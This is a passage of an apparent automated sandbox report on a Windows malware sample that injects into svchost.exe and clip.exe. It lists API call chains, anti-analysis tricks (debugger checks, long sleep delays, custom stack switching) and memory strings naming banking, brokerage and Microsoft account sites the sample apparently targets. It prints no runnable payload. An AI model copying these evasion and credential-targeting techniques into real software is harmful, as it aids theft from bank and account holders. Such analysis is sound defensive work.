            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032B2E4B push ecx; iretd 8_2_032B2E4C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032ADEE3 push edi; ret 8_2_032ADEE4
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032A7D77 push ecx; iretd 8_2_032A7D78
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032A85B6 push 2823B84Bh; retf 8_2_032A85C6
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_0329BC2B pushad ; iretd 8_2_0329BC2D
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_03298419 push es; ret 8_2_0329841D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049D09AD push ecx; mov dword ptr [esp], ecx9_2_049D09B6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A303DB push ecx; retf 9_2_02A303DC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A24193 push ebx; retf 9_2_02A24196
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E14A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_00E14A35
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_00E955FD
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00E333C7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeAPI/Special instruction interceptor: Address: D43204
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E rdtsc 6_2_0347096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 774Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9198Jump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-98947
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep count: 774 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep time: -1548000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep count: 9198 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep time: -18396000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E74696 GetFileAttributesW,FindFirstFileW,FindClose,4_2_00E74696
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_00E7C9C7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7C93C FindFirstFileW,FindClose,4_2_00E7C93C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00E7F200
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00E7F35D
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_00E7F65E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E73A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_00E73A2B
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E73D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_00E73D4E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_00E7BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A2BC20 FindFirstFileW,FindNextFileW,FindClose,9_2_02A2BC20
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E14AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_00E14AFE
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,11696492231]
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696492231|
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 23802I71.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 23802I71.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 23802I71.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
            Source: 23802I71.9.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,116
            Source: 23802I71.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696492231x
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,1169649223
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 23802I71.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: firefox.exe, 0000000D.00000002.1775937404.0000023E799AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII|/P
            Source: 23802I71.9.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,1Od
            Source: 23802I71.9.drBinary or memory string: discord.comVMware20,11696492231f
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 23802I71.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 23802I71.9.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 23802I71.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20wd
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nara Change Transaction PasswordVMware20?d
            Source: 23802I71.9.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3762297447.000000000100F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: 23802I71.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 23802I71.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 23802I71.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 23802I71.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeAPI call chain: ExitProcess graph end nodegraph_4-97910
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E rdtsc 6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004173E3 LdrLoadDll,6_2_004173E3
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E841FD BlockInput,4_2_00E841FD
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E13B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,4_2_00E13B4C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E45CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_00E45CCC
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E8C304 LoadLibraryA,GetProcAddress,4_2_00E8C304
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00D434D0 mov eax, dword ptr fs:[00000030h]4_2_00D434D0
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00D43470 mov eax, dword ptr fs:[00000030h]4_2_00D43470
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00D41E70 mov eax, dword ptr fs:[00000030h]4_2_00D41E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]6_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B035C mov ecx, dword ptr fs:[00000030h]6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]6_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FA352 mov eax, dword ptr fs:[00000030h]6_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D8350 mov ecx, dword ptr fs:[00000030h]6_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0350634F mov eax, dword ptr fs:[00000030h]6_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D437C mov eax, dword ptr fs:[00000030h]6_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h]6_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h]6_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h]6_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342C310 mov ecx, dword ptr fs:[00000030h]6_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450310 mov ecx, dword ptr fs:[00000030h]6_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03508324 mov eax, dword ptr fs:[00000030h]6_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03508324 mov ecx, dword ptr fs:[00000030h]6_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03508324 mov eax, dword ptr fs:[00000030h]6_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03508324 mov eax, dword ptr fs:[00000030h]6_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EC3CD mov eax, dword ptr fs:[00000030h]6_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]6_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]6_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]6_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]6_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]6_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B63C0 mov eax, dword ptr fs:[00000030h]6_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h]6_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h]6_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE3DB mov ecx, dword ptr fs:[00000030h]6_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h]6_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D43D4 mov eax, dword ptr fs:[00000030h]6_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D43D4 mov eax, dword ptr fs:[00000030h]6_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]6_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h]6_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h]6_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h]6_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034663FF mov eax, dword ptr fs:[00000030h]6_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h]6_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h]6_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h]6_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345438F mov eax, dword ptr fs:[00000030h]6_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345438F mov eax, dword ptr fs:[00000030h]6_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428397 mov eax, dword ptr fs:[00000030h]6_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428397 mov eax, dword ptr fs:[00000030h]6_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428397 mov eax, dword ptr fs:[00000030h]6_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B8243 mov eax, dword ptr fs:[00000030h]6_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B8243 mov ecx, dword ptr fs:[00000030h]6_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0350625D mov eax, dword ptr fs:[00000030h]6_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342A250 mov eax, dword ptr fs:[00000030h]6_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436259 mov eax, dword ptr fs:[00000030h]6_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EA250 mov eax, dword ptr fs:[00000030h]6_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EA250 mov eax, dword ptr fs:[00000030h]6_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434260 mov eax, dword ptr fs:[00000030h]6_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434260 mov eax, dword ptr fs:[00000030h]6_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434260 mov eax, dword ptr fs:[00000030h]6_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342826B mov eax, dword ptr fs:[00000030h]6_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]6_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342823B mov eax, dword ptr fs:[00000030h]6_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]6_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]6_2_0343A2C3
